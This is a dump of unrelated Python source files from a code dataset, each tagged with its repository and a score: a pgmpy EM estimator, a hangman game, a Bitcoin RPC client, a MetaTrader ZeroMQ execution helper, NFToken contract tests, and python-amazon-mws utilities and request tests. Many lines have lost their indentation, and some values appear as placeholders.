df = data_unique.iloc[[i] * latent_combinations.shape[0]].reset_index(
drop=True
)
for index, latent_var in enumerate(latent_card.keys()):
df[latent_var] = latent_combinations[:, index]
weights = df.apply(lambda t: self._get_likelihood(dict(t)), axis=1)
df["_weight"] = (weights / weights.sum()) * n_counts[
tuple(data_unique.iloc[i])
]
cache.append(df)
return pd.concat(cache, copy=False)
def _is_converged(self, new_cpds, atol=1e-08):
"""
        Checks if the values of `new_cpds` are within the tolerance limits of
        the current model cpds.
"""
for cpd in new_cpds:
if not cpd.__eq__(self.model_copy.get_cpds(node=cpd.scope()[0]), atol=atol):
return False
return True
def get_parameters(
self,
latent_card=None,
max_iter=100,
atol=1e-08,
n_jobs=-1,
seed=None,
show_progress=True,
):
"""
        Method to estimate all model parameters (CPDs) using Expectation Maximization.
Parameters
----------
latent_card: dict (default: None)
A dictionary of the form {latent_var: cardinality} specifying the
cardinality (number of states) of each latent variable. If None,
assumes `2` states for each latent variable.
max_iter: int (default: 100)
The maximum number of iterations the algorithm is allowed to run for.
If max_iter is reached, return the last value of parameters.
atol: int (default: 1e-08)
The absolute accepted tolerance for checking convergence. If the parameters
change is less than atol in an iteration, the algorithm will exit.
n_jobs: int (default: -1)
Number of jobs to run in parallel. Default: -1 uses all the processors.
seed: int
            The random seed to use for generating the initial values.
show_progress: boolean (default: True)
Whether to show a progress bar for iterations.
Returns
-------
        Estimated parameters (CPDs): list
A list of estimated CPDs for the model.
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianNetwork
>>> from pgmpy.estimators import ExpectationMaximization as EM
>>> data = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 3)),
... columns=['A', 'C', 'D'])
>>> model = BayesianNetwork([('A', 'B'), ('C', 'B'), ('C', 'D')], latents={'B'})
>>> estimator = EM(model, data)
>>> estimator.get_parameters(latent_card={'B': 3})
[<TabularCPD representing P(C:2) at 0x7f7b534251d0>,
<TabularCPD representing P(B:3 | C:2, A:2) at 0x7f7b4dfd4da0>,
<TabularCPD representing P(A:2) at 0x7f7b4dfd4fd0>,
<TabularCPD representing P(D:2 | C:2) at 0x7f7b4df822b0>]
"""
# Step 1: Parameter checks
if latent_card is None:
latent_card = {var: 2 for var in self.model_copy.latents}
# Step 2: Create structures/variables to be used later.
n_states_dict = {key: len(value) for key, value in self.state_names.items()}
n_states_dict.update(latent_card)
for var in self.model_copy.latents:
self.state_names[var] = list(range(n_states_dict[var]))
# Step 3: Initialize random CPDs if starting values aren't provided.
if seed is not None:
np.random.seed(seed)
cpds = []
for node in self.model_copy.nodes():
parents = list(self.model_copy.predecessors(node))
cpds.append(
TabularCPD.get_random(
variable=node,
evidence=parents,
cardinality={
var: n_states_dict[var] for var in chain([node], parents)
},
state_names={
var: self.state_names[var] for var in chain([node], parents)
},
)
)
self.model_copy.add_cpds(*cpds)
if show_progress and SHOW_PROGRESS:
pbar = tqdm(total=max_iter)
# Step 4: Run the EM algorithm.
for _ in range(max_iter):
# Step 4.1: E-step: Expands the dataset and computes the likelihood of each
# possible state of latent variables.
weighted_data = self._compute_weights(latent_card)
# Step 4.2: M-step: Uses the weights of the dataset to do a weighted MLE.
new_cpds = MaximumLikelihoodEstimator(
self.model_copy, weighted_data
).get_parameters(n_jobs=n_jobs, weighted=True)
            # Step 4.3: Check for convergence and max_iter
if self._is_converged(new_cpds, atol=atol):
if show_progress and SHOW_PROGRESS:
pbar.close()
return new_cpds
else:
self.model_copy.cpds = new_cpds
if show_progress and SHOW_PROGRESS:
pbar.update(1)
return cpds
``` |
{
"source": "1BitsGit/hangmanpy",
"score": 3
} |
#### File: 1BitsGit/hangmanpy/main.py
```python
from colorama import Fore
from random_word import RandomWords
# CREDITS TO https://github.com/vaibhavsingh97/random-word created by vaibhavsingh97 for the random word package!
# Give them all the love for making my life SO EASY If you are getting errors run "pip install random_word" and then
# "pip install yaml" in your terminal
while True:
in_game = False
print(f"""
{Fore.CYAN}┌──────────────────────────────────────────────────────────────────────────────────────┐
_
| |__ __ _ _ __ __ _ _ __ ___ __ _ _ __
| '_ \ / _` | '_ \ / _` | '_ ` _ \ / _` | '_
| | | | (_| | | | | (_| | | | | | | (_| | | | |
|_| |_|\__,_|_| |_|\__, |_| |_| |_|\__,_|_| |_|
|___/
{Fore.CYAN}└──────────────────────────────────────────────────────────────────────────────────────┘
{Fore.RESET}Type{Fore.LIGHTRED_EX} "help" {Fore.RESET}in any case for a help menu.
{Fore.LIGHTMAGENTA_EX}Made by [name omitted lolol] for [my class]! (v1.0)
{Fore.RESET}
""")
def custom_input(message):
print(f"{Fore.WHITE}[{Fore.LIGHTGREEN_EX}>>>{Fore.WHITE}] {Fore.RESET}", end="")
input_return = input(message)
return input_return
# vars (6 lives for head body two arms two legs)
guess = ""
lives = 6
hints = 0
egg = False
r = RandomWords()
word = r.get_random_word(hasDictionaryDef="true", maxLength=7, minLength=3).upper()
menu = len(word) * "_ "
guessed_letters = []
completed = False
# int line 4 usr
while in_game is False:
initial_input = custom_input("").lower()
if initial_input == "help":
print("""Help menu:
**note, case doesn't matter.
start -> starts the game
settings -> modify your settings
quit -> leave the game
leave -> exit the settings menu""")
elif initial_input == "debug":
print(word)
elif initial_input == "rr":
word = r.get_random_word(hasDictionaryDef="true", maxLength=7, minLength=3).upper()
print(word)
elif initial_input == "egg = true":
egg = True
# hi !
elif initial_input == "start":
print(f"{Fore.LIGHTGREEN_EX}You're in game now! Type a letter to begin.{Fore.RESET}")
in_game = True
elif initial_input == "settings":
print(f"""Settings are as follow:
You have: {lives} lives.
You have: {hints} hints.
type "leave" to exit settings, type hints/lives to change their value""")
while True:
setting_input = custom_input("").lower()
if setting_input == "leave":
print("leaving")
break
elif setting_input == "quit:":
quit("Thanks for playin!")
elif setting_input == "settings":
print("You're already in settings! Here are your settings though: (type leave to leave)")
print(f"""Settings are as follow:
You have: {lives} lives.
You have: {hints} hints.
type "leave" to exit settings, type hints/lives to change their value""")
elif setting_input == "hints":
hints = int(input("How many hints do you want? "))
elif setting_input == "lives":
lives = int(input("How many lives do you want? "))
else:
print("You're still in the settings menu, type leave to leave or type in hints or lives to change those values.")
elif initial_input == "quit":
quit("Thanks for playin!")
else:
print("Sorry! I don't get what you mean, type help for more help")
while in_game is True and completed is False:
guess = custom_input("").upper()
if guess in guessed_letters:
print(f"""{Fore.BLUE}Sorry "{guess}", matches one of your guessed letters!
({guessed_letters}){Fore.RESET}""")
print()
elif guess not in word:
lives -= 1
print(f"{Fore.RED}Sorry, that isn't in the word.{Fore.RESET}")
guessed_letters.append(guess)
elif guess in word and len(guess) == 1:
print(f"{Fore.BLUE}Awesome! You got a letter! {Fore.RESET}")
guessed_letters.append(guess)
elif len(guess) == len(word):
if guess == word:
print(f"{Fore.LIGHTMAGENTA_EX}You've guessed the word!{Fore.RESET}")
completed = True
else:
print(f"{Fore.RED}Sorry, that's not the correct word.{Fore.RESET}")
lives -= 1
        elif len(guess) != 1:  # a multi-letter guess that matched a substring of the word
print(f"{Fore.BLUE}It seems like you tried to guess the word, but it was too long/short.{Fore.RESET}")
print()
if completed is False:
ig_menu = ""
for letters in word:
if letters in guessed_letters:
ig_menu += letters
else:
ig_menu += "_ "
print(f"{ig_menu} (You still have {lives} lives/life left.)")
if ig_menu == word:
print(f"{Fore.LIGHTMAGENTA_EX}Congratulations! You've guessed the word, {Fore.WHITE}{word}! "
f"{Fore.LIGHTMAGENTA_EX}You had {Fore.WHITE}{lives}{Fore.LIGHTMAGENTA_EX} lives left!{Fore.RESET}")
print()
completed = True
repeat_game = input("Do you want to play again? Y/N ").lower()
if repeat_game == "y":
in_game = False
elif repeat_game == "n":
quit("Thanks for playing, see ya!")
else:
print("I don't know what that input is, type y/n")
if lives == 0:
print(f"{Fore.RED}Sorry! You ran out of lives!")
repeat_game = input("Do you want to play again? Y/N ").lower()
print()
if repeat_game == "y":
in_game = False
continue
elif repeat_game == "n":
quit("Thanks for playing, see ya!")
else:
print("I don't know what that input is, type y/n")
``` |
{
"source": "1Blackdiamondsc/bitcoincli",
"score": 2
} |
#### File: bitcoincli/bitcoincli/client.py
```python
import json
import logging
import requests
from base64 import b64encode
log = logging.getLogger(__name__)
class Bitcoin():
__id_count = 0
def __init__(self,
rpcuser,
rpcpasswd,
rpchost,
rpcport,
rpc_call=None
):
self.__rpcuser = rpcuser
self.__rpcpasswd = <PASSWORD>
self.__rpchost = rpchost
self.__rpcport = rpcport
self.__auth_header = ' '.join(
['Basic', b64encode(':'.join([rpcuser, rpcpasswd]).encode()).decode()]
)
self.__headers = {'Host': self.__rpchost,
'User-Agent': 'Bitcoin python binding',
'Authorization': self.__auth_header,
'Content-type': 'application/json'
}
self.__rpc_call = rpc_call
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
if self.__rpc_call is not None:
name = "%s.%s" % (self.__rpc_call, name)
return Bitcoin(self.__rpcuser,
self.__rpcpasswd,
self.__rpchost,
self.__rpcport,
name)
def __call__(self, *args):
Bitcoin.__id_count += 1
postdata = {'params': args,
'method': self.__rpc_call,
'id': Bitcoin.__id_count}
protocol = 'https' if int(self.__rpcport) == 443 else 'http'
url = '{0}://{1}:{2}'.format(protocol, self.__rpchost, self.__rpcport)
encoded = json.dumps(postdata)
log.info("Request: %s" % encoded)
r = requests.post(url, data=encoded, headers=self.__headers)
if r.status_code == 200:
log.info("Response: %s" % r.json())
return r.json()['result']
else:
log.error("Error! Status code: %s" % r.status_code)
log.error("Text: %s" % r.text)
log.error("Json: %s" % r.json())
return r.json()
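# --- Hedged usage sketch (editor addition) ---
# __getattr__ above turns attribute access into JSON-RPC method names, so any
# bitcoind RPC can be called directly. Credentials and host are placeholders.
#
# btc = Bitcoin('rpcuser', 'rpcpassword', '127.0.0.1', '8332')
# info = btc.getblockchaininfo()
# genesis = btc.getblockhash(0)   # positional args become the RPC 'params'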
``` |
{
"source": "1Blackdiamondsc/dwx-zeromq-connector",
"score": 2
} |
#### File: template/modules/DWX_ZMQ_Execution.py
```python
from pandas import to_datetime
from time import sleep
class DWX_ZMQ_Execution():
def __init__(self, _zmq):
self._zmq = _zmq
##########################################################################
def _execute_(self,
_exec_dict,
_verbose=False,
_delay=0.1,
_wbreak=10):
_check = ''
# Reset thread data output
self._zmq._set_response_(None)
# OPEN TRADE
if _exec_dict['_action'] == 'OPEN':
_check = '_action'
self._zmq._DWX_MTX_NEW_TRADE_(_order=_exec_dict)
# CLOSE TRADE
elif _exec_dict['_action'] == 'CLOSE':
_check = '_response_value'
self._zmq._DWX_MTX_CLOSE_TRADE_BY_TICKET_(_exec_dict['_ticket'])
if _verbose:
print('\n[{}] {} -> MetaTrader'.format(_exec_dict['_comment'],
str(_exec_dict)))
# While loop start time reference
_ws = to_datetime('now')
# While data not received, sleep until timeout
        while not self._zmq._valid_response_('zmq'):
sleep(_delay)
if (to_datetime('now') - _ws).total_seconds() > (_delay * _wbreak):
break
# If data received, return DataFrame
if self._zmq._valid_response_('zmq'):
if _check in self._zmq._get_response_().keys():
return self._zmq._get_response_()
# Default
return None
##########################################################################
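# --- Hedged usage sketch (editor addition) ---
# Example of the _exec_dict this helper expects. Only '_action', '_ticket'
# and '_comment' appear in the code above; the remaining order fields and
# the connector object are assumptions about the DWX connector API.
#
# exec_api = DWX_ZMQ_Execution(_zmq=connector)  # connector: a DWX ZeroMQ connector instance
# open_order = {'_action': 'OPEN', '_symbol': 'EURUSD', '_lots': 0.01,
#               '_comment': 'demo'}
# response = exec_api._execute_(open_order, _verbose=True)
# close_order = {'_action': 'CLOSE', '_ticket': 12345678, '_comment': 'demo'}
# response = exec_api._execute_(close_order, _verbose=True)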
``` |
{
"source": "1Blackdiamondsc/nftoken",
"score": 2
} |
#### File: nftoken/tests/conftest.py
```python
import functools
import pytest
# test isolation, always use!
@pytest.fixture(autouse=True)
def isolation(fn_isolation):
pass
# contract deployment
@pytest.fixture(scope="module")
def nft(accounts, NFToken):
token = accounts[0].deploy(NFToken, "Test NFT", "NFT", 30000)
token.transfer(accounts[1], 10000, {"from": accounts[0]})
token.transfer(accounts[2], 10000, {"from": accounts[0]})
token.transfer(accounts[3], 10000, {"from": accounts[0]})
yield token
@pytest.fixture(scope="module")
def nftmint(accounts, NFTokenMintable):
token = accounts[0].deploy(NFTokenMintable, "Test NFT", "NFT", 0)
yield token
# range and balance checks
@pytest.fixture(scope="module")
def check_ranges(accounts, nft):
upper = nft.totalSupply() + 1
yield functools.partial(_check_ranges, accounts, upper, nft=nft)
def _check_ranges(accounts, upper, *expected_ranges, nft=None):
for num, expected in enumerate(expected_ranges, start=1):
account = accounts[num]
ranges = nft.rangesOf(account)
assert set(ranges) == set(expected)
assert nft.balanceOf(account) == sum((i[1] - i[0]) for i in ranges)
for start, stop in ranges:
if stop - start == 1:
assert nft.getRange(start)[:3] == (account, start, stop)
continue
for i in range(max(1, start - 1), start + 2):
try:
data = nft.getRange(i)
except Exception:
raise AssertionError(f"Could not get range pointer {i} for account {num}")
if i < start:
assert data[0] != account
else:
assert data[0] == account
for i in range(stop - 1, min(stop + 1, upper)):
data = nft.getRange(i)
if i < stop:
assert data[0] == account
else:
assert data[0] != account
```
#### File: tests/stateful/test_transfer_one.py
```python
import brownie
from brownie.test import strategy
def test_stateful_transfer_one_token(BaseStateMachine, state_machine, NFToken, accounts):
"""
Stateful test that verifies range pointer modifications when
dealing with single token transfers and small ranges.
"""
class StateMachine(BaseStateMachine):
st_amount = strategy("uint256", max_value=1000000)
st_sender = strategy("address")
st_receiver = strategy("address")
def __init__(cls, NFToken, accounts):
super().__init__(cls, NFToken, accounts, len(accounts))
for account in accounts[1:]:
cls.nft.transfer(account, 1, {"from": accounts[0]})
def setup(self):
self.balances = {i: 1 for i in self.accounts}
# transfers a single token
def rule_transfer_one(self, st_sender, st_receiver):
if self.balances[st_sender]:
self.nft.transfer(st_receiver, 1, {"from": st_sender})
self.balances[st_sender] -= 1
self.balances[st_receiver] += 1
else:
with brownie.reverts("dev: underflow"):
self.nft.transfer(st_receiver, 1, {"from": st_sender})
# transfers a single token using transferRange
def rule_transfer_range_one(self, st_sender, st_receiver):
if self.balances[st_sender]:
start = self.nft.rangesOf(st_sender)[-1][0]
self.nft.transferRange(st_receiver, start, start + 1, {"from": st_sender})
self.balances[st_sender] -= 1
self.balances[st_receiver] += 1
else:
with brownie.reverts("dev: underflow"):
self.nft.transfer(st_receiver, 1, {"from": st_sender})
settings = {"stateful_step_count": 20, "max_examples": 20}
state_machine(StateMachine, NFToken, accounts, settings=settings)
``` |
{
"source": "1Blackdiamondsc/python-amazon-mws",
"score": 4
} |
#### File: mws/utils/crypto.py
```python
import base64
import hashlib
def calc_md5(string):
"""Generates base64-encoded MD5 hash of `string`."""
md5_hash = hashlib.md5()
md5_hash.update(string)
return base64.b64encode(md5_hash.digest()).strip(b"\n")
def response_md5_is_valid(response):
"""Checks the MD5 hash of ``response.content`` against that response's
"content-md5" header. Returns ``True`` if they match, else ``False``.
If the response does not include a ``content-md5`` header, we can't verify it,
but we should not hold up that response. Thus, returns ``True`` in this case.
"""
if "content-md5" not in response.headers:
# We can't check a hash that doesn't exist,
# but we won't stop responses that don't supply one.
return True
hash_ = calc_md5(response.content)
return response.headers["content-md5"].encode() == hash_
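# --- Hedged usage example (editor addition) ---
# calc_md5 operates on bytes, since hashlib's update() requires bytes:
#
# calc_md5(b"hello world")   # -> b'XrY7u+Ae7tCTyyK7j1rNww=='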
```
#### File: mws/utils/timezone.py
```python
import datetime
def mws_utc_now():
"""Returns the current UTC time, as expected by MWS.
Note that we set microseconds to 0 automatically with this method:
if you want the true UTC datetime, just run `datetime.datetime.utcnow()`.
"""
return datetime.datetime.utcnow().replace(microsecond=0)
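# --- Editor note (hedged) ---
# mws_utc_now().isoformat() yields a second-precision timestamp such as
# '2023-01-01T12:00:00', the ISO-8601 form MWS expects in request parameters.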
```
#### File: tests/deprecations/test_remove_in_v10.py
```python
import pytest
from mws.mws import MWS
from mws.utils.deprecation import RemovedInPAM10Warning
def test_mws_enumerate_params_method_removed(mws_credentials):
mws = MWS(**mws_credentials)
with pytest.warns(RemovedInPAM10Warning):
mws.enumerate_param("Something", [1, 2, 3])
```
#### File: tests/request_methods/test_finances.py
```python
import unittest
import datetime
import mws
from mws.utils import clean_date
from .utils import CommonAPIRequestTools
class FinancesTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for Finances."""
api_class = mws.Finances
# TODO: Add remaining methods for Finances
def test_list_financial_event_groups(self):
"""
ListFinancialEventGroups operation.
"""
created_after = datetime.datetime.utcnow()
created_before = datetime.datetime.utcnow()
max_results = 659
params = self.api.list_financial_event_groups(
created_after=created_after,
created_before=created_before,
max_results=max_results,
)
self.assert_common_params(params, action="ListFinancialEventGroups")
self.assertEqual(
params["FinancialEventGroupStartedAfter"], clean_date(created_after)
)
self.assertEqual(
params["FinancialEventGroupStartedBefore"], clean_date(created_before)
)
self.assertEqual(params["MaxResultsPerPage"], str(max_results))
def test_list_financial_event_groups_by_next_token(self):
"""
ListFinancialEventGroupsByNextToken operation, via method decorator.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_event_groups(next_token=next_token)
self.assert_common_params(params, action="ListFinancialEventGroupsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_financial_event_groups_by_next_token_alias(self):
"""
ListFinancialEventGroupsByNextToken operation, via alias method.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_event_groups_by_next_token(next_token)
self.assert_common_params(params, action="ListFinancialEventGroupsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_financial_events(self):
"""
ListFinancialEvents operation.
"""
posted_after = datetime.datetime.utcnow()
posted_before = datetime.datetime.utcnow()
amazon_order_id = "123-4567890-1234567"
financial_event_group_id = "22YgYW55IGNhcm5hbCBwbGVhEXAMPLE"
max_results = 156
params = self.api.list_financial_events(
financial_event_group_id=financial_event_group_id,
amazon_order_id=amazon_order_id,
posted_after=posted_after,
posted_before=posted_before,
max_results=max_results,
)
self.assert_common_params(params, action="ListFinancialEvents")
self.assertEqual(params["FinancialEventGroupId"], financial_event_group_id)
self.assertEqual(params["AmazonOrderId"], amazon_order_id)
self.assertEqual(params["PostedAfter"], clean_date(posted_after))
self.assertEqual(params["PostedBefore"], clean_date(posted_before))
self.assertEqual(params["MaxResultsPerPage"], str(max_results))
def test_list_financial_events_by_next_token(self):
"""
ListFinancialEventsByNextToken operation, via method decorator.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_events(next_token=next_token)
self.assert_common_params(params, action="ListFinancialEventsByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_financial_events_by_next_token_alias(self):
"""
ListFinancialEventsByNextToken operation, via alias method.
"""
next_token = "<PASSWORD>"
params = self.api.list_financial_events_by_next_token(next_token)
self.assert_common_params(params, action="ListFinancialEventsByNextToken")
self.assertEqual(params["NextToken"], next_token)
```
#### File: tests/request_methods/test_inventory.py
```python
import unittest
import datetime
import mws
from mws.utils import clean_date
from .utils import CommonAPIRequestTools
class InventoryTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for Inventory."""
api_class = mws.Inventory
def test_list_inventory_supply(self):
"""ListInventorySupply operation."""
now = datetime.datetime.utcnow()
skus = ["thing1", "thing2"]
response_group = "Detailed"
params = self.api.list_inventory_supply(
skus, now, response_group=response_group
)
self.assert_common_params(params, action="ListInventorySupply")
self.assertEqual(params["QueryStartDateTime"], clean_date(now))
self.assertEqual(params["ResponseGroup"], "Detailed")
self.assertEqual(params["SellerSkus.member.1"], "thing1")
self.assertEqual(params["SellerSkus.member.2"], "thing2")
def test_list_inventory_supply_by_next_token(self):
"""ListInventorySupplyByNextToken operation, using `next_token` argument."""
next_token = "token_foobar"
params = self.api.list_inventory_supply(next_token=next_token)
self.assert_common_params(params, action="ListInventorySupplyByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_inventory_supply_by_next_token_alias(self):
"""ListInventorySupplyByNextToken operation, using alias method."""
next_token = "token_foobar"
params = self.api.list_inventory_supply_by_next_token(next_token)
self.assert_common_params(params, action="ListInventorySupplyByNextToken")
self.assertEqual(params["NextToken"], next_token)
```
#### File: tests/request_methods/test_merchantfulfillment.py
```python
import datetime
import unittest
import mws
from .utils import (
CommonAPIRequestTools,
clean_date,
clean_string,
clean_bool,
)
class MerchantFulfillmentTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for MerchantFulfillment."""
api_class = mws.MerchantFulfillment
# TODO: Add remaining methods for MerchantFulfillment
def test_get_eligible_shipping_services(self):
"""GetEligibleShippingServices operation."""
amazon_order_id = "903-9939455-1336669"
seller_order_id = "something-or-other"
items = [
{"OrderItemId": "1234567890", "Quantity": "1"},
{"OrderItemId": "0987654321", "Quantity": "5"},
]
# Fake generated name and address, not likely a real person or phone number.
ship_from_address = {
"Name": "<NAME>",
"AddressLine1": "2025 Foley Street",
"City": "Miramar",
"StateOrProvinceCode": "FL",
"PostalCode": "33025",
"CountryCode": "US",
"Email": "<EMAIL>",
"Phone": "954-655-0094",
}
package_dimensions = {
"Length": "12",
"Width": "34",
"Height": "25",
"Unit": "centimeters",
}
weight = {
"Value": "308",
"Unit": "grams",
}
must_arrive_by_date = datetime.datetime.utcnow()
ship_date = datetime.datetime.utcnow() + datetime.timedelta(days=14)
shipping_service_options = {
"DeliveryExperience": "DeliveryConfirmationWithoutSignature",
"CarrierWillPickUp": False,
"DeclaredValue.Amount": "10.00",
"DeclaredValue.CurrencyCode": "USD",
}
label_customization = {
"CustomTextForLabel": "NO ALLIGATORS!",
"StandardIdForLabel": "AmazonOrderId",
}
include_complex_options = True
# Get request params
params = self.api.get_eligible_shipping_services(
amazon_order_id=amazon_order_id,
seller_order_id=seller_order_id,
items=items,
ship_from_address=ship_from_address,
package_dimensions=package_dimensions,
weight=weight,
must_arrive_by_date=must_arrive_by_date,
ship_date=ship_date,
shipping_service_options=shipping_service_options,
label_customization=label_customization,
include_complex_options=include_complex_options,
)
self.assert_common_params(params, action="GetEligibleShippingServices")
# Check for our expected params
# fmt: off
expected = {
"ShipmentRequestDetails.AmazonOrderId": clean_string(amazon_order_id),
"ShipmentRequestDetails.SellerOrderId": clean_string(seller_order_id),
"ShipmentRequestDetails.MustArriveByDate": clean_date(must_arrive_by_date),
"ShipmentRequestDetails.PackageDimensions.Length": clean_string(package_dimensions["Length"]),
"ShipmentRequestDetails.PackageDimensions.Width": clean_string(package_dimensions["Width"]),
"ShipmentRequestDetails.PackageDimensions.Height": clean_string(package_dimensions["Height"]),
"ShipmentRequestDetails.PackageDimensions.Unit": clean_string(package_dimensions["Unit"]),
"ShipmentRequestDetails.Weight.Value": clean_string(weight["Value"]),
"ShipmentRequestDetails.Weight.Unit": clean_string(weight["Unit"]),
"ShipmentRequestDetails.ShipDate": clean_date(ship_date),
"ShipmentRequestDetails.ShipFromAddress.Name": clean_string(ship_from_address["Name"]),
"ShipmentRequestDetails.ShipFromAddress.AddressLine1": clean_string(ship_from_address["AddressLine1"]),
"ShipmentRequestDetails.ShipFromAddress.City": clean_string(ship_from_address["City"]),
"ShipmentRequestDetails.ShipFromAddress.StateOrProvinceCode": clean_string(ship_from_address["StateOrProvinceCode"]),
"ShipmentRequestDetails.ShipFromAddress.PostalCode": clean_string(ship_from_address["PostalCode"]),
"ShipmentRequestDetails.ShipFromAddress.CountryCode": clean_string(ship_from_address["CountryCode"]),
"ShipmentRequestDetails.ShipFromAddress.Email": clean_string(ship_from_address["Email"]),
"ShipmentRequestDetails.ShipFromAddress.Phone": clean_string(ship_from_address["Phone"]),
"ShipmentRequestDetails.ShippingServiceOptions.DeliveryExperience": clean_string(shipping_service_options["DeliveryExperience"]),
"ShipmentRequestDetails.ShippingServiceOptions.CarrierWillPickUp": clean_bool(shipping_service_options["CarrierWillPickUp"]),
"ShipmentRequestDetails.ShippingServiceOptions.DeclaredValue.CurrencyCode": clean_string(shipping_service_options["DeclaredValue.CurrencyCode"]),
"ShipmentRequestDetails.ShippingServiceOptions.DeclaredValue.Amount": clean_string(shipping_service_options["DeclaredValue.Amount"]),
"ShipmentRequestDetails.ItemList.Item.1.OrderItemId": clean_string(items[0]["OrderItemId"]),
"ShipmentRequestDetails.ItemList.Item.1.Quantity": clean_string(items[0]["Quantity"]),
"ShipmentRequestDetails.ItemList.Item.2.OrderItemId": clean_string(items[1]["OrderItemId"]),
"ShipmentRequestDetails.ItemList.Item.2.Quantity": clean_string(items[1]["Quantity"]),
"ShippingOfferingFilter.IncludeComplexShippingOptions": clean_bool(include_complex_options),
}
# fmt: on
for key, val in expected.items():
self.assertEqual(params[key], val)
# def test_create_shipment(self):
# """CreateShipment operation."""
# params = self.api.create_shipment()
# self.assert_common_params(params, action="CreateShipment")
def test_get_additional_seller_inputs(self):
"""GetAdditionalSellerInputs operation."""
order_id = "922-2942641-9412606"
shipping_service_id = "CHINA_POST_E_COURIER_PRI"
ship_from_address = {
"Name": "Shenzhen Address",
"AddressLine1": "test address",
"City": "Shenzhen",
"StateOrProvinceCode": "Guangdong",
"PostalCode": "510810",
"CountryCode": "CN",
"Email": "<EMAIL>",
"Phone": "555-555-5555",
}
params = self.api.get_additional_seller_inputs(
order_id=order_id,
shipping_service_id=shipping_service_id,
ship_from_address=ship_from_address,
)
self.assert_common_params(params, action="GetAdditionalSellerInputs")
# fmt: off
expected = {
"OrderId": clean_string(order_id),
"ShippingServiceId": clean_string(shipping_service_id),
"ShipFromAddress.Name": clean_string(ship_from_address["Name"]),
"ShipFromAddress.AddressLine1": clean_string(ship_from_address["AddressLine1"]),
"ShipFromAddress.City": clean_string(ship_from_address["City"]),
"ShipFromAddress.StateOrProvinceCode": clean_string(ship_from_address["StateOrProvinceCode"]),
"ShipFromAddress.PostalCode": clean_string(ship_from_address["PostalCode"]),
"ShipFromAddress.CountryCode": clean_string(ship_from_address["CountryCode"]),
"ShipFromAddress.Email": clean_string(ship_from_address["Email"]),
"ShipFromAddress.Phone": clean_string(ship_from_address["Phone"]),
}
# fmt: on
for key, val in expected.items():
self.assertEqual(params[key], val)
def test_get_shipment(self):
"""GetShipment operation."""
shipment_id = "UCXN7ZubAj"
params = self.api.get_shipment(
shipment_id=shipment_id,
)
self.assert_common_params(params, action="GetShipment")
self.assertEqual(params["ShipmentId"], shipment_id)
def test_cancel_shipment(self):
"""CancelShipment operation."""
shipment_id = "C6Pvk0b2yZ"
params = self.api.cancel_shipment(
shipment_id=shipment_id,
)
self.assert_common_params(params, action="CancelShipment")
self.assertEqual(params["ShipmentId"], shipment_id)
```
#### File: tests/request_methods/test_orders.py
```python
import datetime
import unittest
import mws
from mws.utils import clean_date
from .utils import CommonAPIRequestTools
class OrdersTestCase(CommonAPIRequestTools, unittest.TestCase):
"""Test cases for Orders."""
api_class = mws.Orders
# TODO: Add remaining methods for Orders
def test_list_orders(self):
"""ListOrders operation."""
created_after = datetime.datetime.utcnow()
created_before = datetime.datetime.utcnow() + datetime.timedelta(hours=1)
last_updated_after = datetime.datetime.utcnow() + datetime.timedelta(hours=2)
last_updated_before = datetime.datetime.utcnow() + datetime.timedelta(hours=3)
max_results = 83
marketplace_ids = [
"DV1t7ZOrjM",
"LbGcgtGwEe",
]
order_statuses = [
"PendingAvailability",
"Unshipped",
]
fulfillment_channels = [
"AFN",
"MFN",
]
payment_methods = [
"COD",
"CVS",
]
buyer_email = "<EMAIL>"
seller_order_id = "LbGcgtGwEe"
tfm_shipment_statuses = [
"PendingPickUp",
"AtDestinationFC",
]
params = self.api.list_orders(
marketplace_ids=marketplace_ids,
created_after=created_after,
created_before=created_before,
last_updated_after=last_updated_after,
last_updated_before=last_updated_before,
order_statuses=order_statuses,
fulfillment_channels=fulfillment_channels,
payment_methods=payment_methods,
buyer_email=buyer_email,
seller_order_id=seller_order_id,
max_results=max_results,
tfm_shipment_statuses=tfm_shipment_statuses,
)
self.assert_common_params(params, action="ListOrders")
self.assertEqual(params["CreatedAfter"], clean_date(created_after))
self.assertEqual(params["CreatedBefore"], clean_date(created_before))
self.assertEqual(params["LastUpdatedAfter"], clean_date(last_updated_after))
self.assertEqual(params["LastUpdatedBefore"], clean_date(last_updated_before))
self.assertEqual(params["BuyerEmail"], "dudley.do.right%40example.com")
self.assertEqual(params["SellerOrderId"], seller_order_id)
self.assertEqual(params["MaxResultsPerPage"], str(max_results))
self.assertEqual(params["OrderStatus.Status.1"], order_statuses[0])
self.assertEqual(params["OrderStatus.Status.2"], order_statuses[1])
self.assertEqual(params["MarketplaceId.Id.1"], marketplace_ids[0])
self.assertEqual(params["MarketplaceId.Id.2"], marketplace_ids[1])
self.assertEqual(
params["FulfillmentChannel.Channel.1"], fulfillment_channels[0]
)
self.assertEqual(
params["FulfillmentChannel.Channel.2"], fulfillment_channels[1]
)
self.assertEqual(params["PaymentMethod.Method.1"], payment_methods[0])
self.assertEqual(params["PaymentMethod.Method.2"], payment_methods[1])
self.assertEqual(params["TFMShipmentStatus.Status.1"], tfm_shipment_statuses[0])
self.assertEqual(params["TFMShipmentStatus.Status.2"], tfm_shipment_statuses[1])
def test_list_orders_by_next_token(self):
"""ListOrdersByNextToken operation, via method decorator."""
next_token = "<PASSWORD>"
params = self.api.list_orders(next_token=next_token)
self.assert_common_params(params, action="ListOrdersByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_list_orders_by_next_token_alias(self):
"""ListOrdersByNextToken operation, via alias method."""
next_token = "<PASSWORD>"
params = self.api.list_orders_by_next_token(next_token)
self.assert_common_params(params, action="ListOrdersByNextToken")
self.assertEqual(params["NextToken"], next_token)
def test_get_order(self):
"""GetOrder operation."""
amazon_order_ids = [
"983-3553534-8677372",
"663-9447020-5093135",
"918-0947007-5135971",
]
